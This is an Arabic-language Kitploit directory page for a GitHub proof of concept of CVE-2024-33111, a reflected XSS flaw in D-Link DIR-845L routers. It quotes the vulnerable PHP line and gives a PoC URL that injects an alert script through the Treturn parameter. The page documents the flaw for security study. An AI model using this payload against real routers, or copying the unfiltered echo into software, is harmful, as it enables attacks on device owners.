Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2024-33111 — جهاز التوجيه D-Link DIR-845L معرض لهجوم البرمجة النصية عبر المواقع (XSS) عبر /htdocs/webinc/js/bsc_sms_inbox.php. | Kitploit
أدوات/GitHubGitHub/fallenskill1/cve-2024-33111
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويبأمن الويباختبار الاختراق
GitHubfallenskill1/cve-2024-33111

CVE-2024-33111

جهاز التوجيه D-Link DIR-845L معرض لهجوم البرمجة النصية عبر المواقع (XSS) عبر /htdocs/webinc/js/bsc_sms_inbox.php.

عرض المستودع
منذ 2 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2024-33111

أجهزة التوجيه D-Link DIR-845L الإصدار 1.01KRb03 وما دونه عرضة لهجوم البرمجة النصية عبر المواقع (XSS) عبر /htdocs/webinc/js/bsc_sms_inbox.php.

المكون الضعيف

  • /htdocs/webinc/js/bsc_sms_inbox.php

التفاصيل التقنية

يرجع الضعف إلى عدم وجود تصفية في الوسيط $_GET["Treturn"] الذي يُستخدم مباشرة في الكود في السطر 17 من bsc_sms_inbox.php.

مقتطف الشفرة الضعيف:

root@kitploit:~
var get_Treturn = '`<?if($_GET["Treturn"]=="") echo "0"; else echo $_GET["Treturn"];?>';

PoC

root@kitploit:~
http://IP:8080/bsc_sms_inbox.php?Treturn=%27%3C/script%3E%3Cscript%3Ealert(1337)%3C/script%3E

image

تنزيل الأداة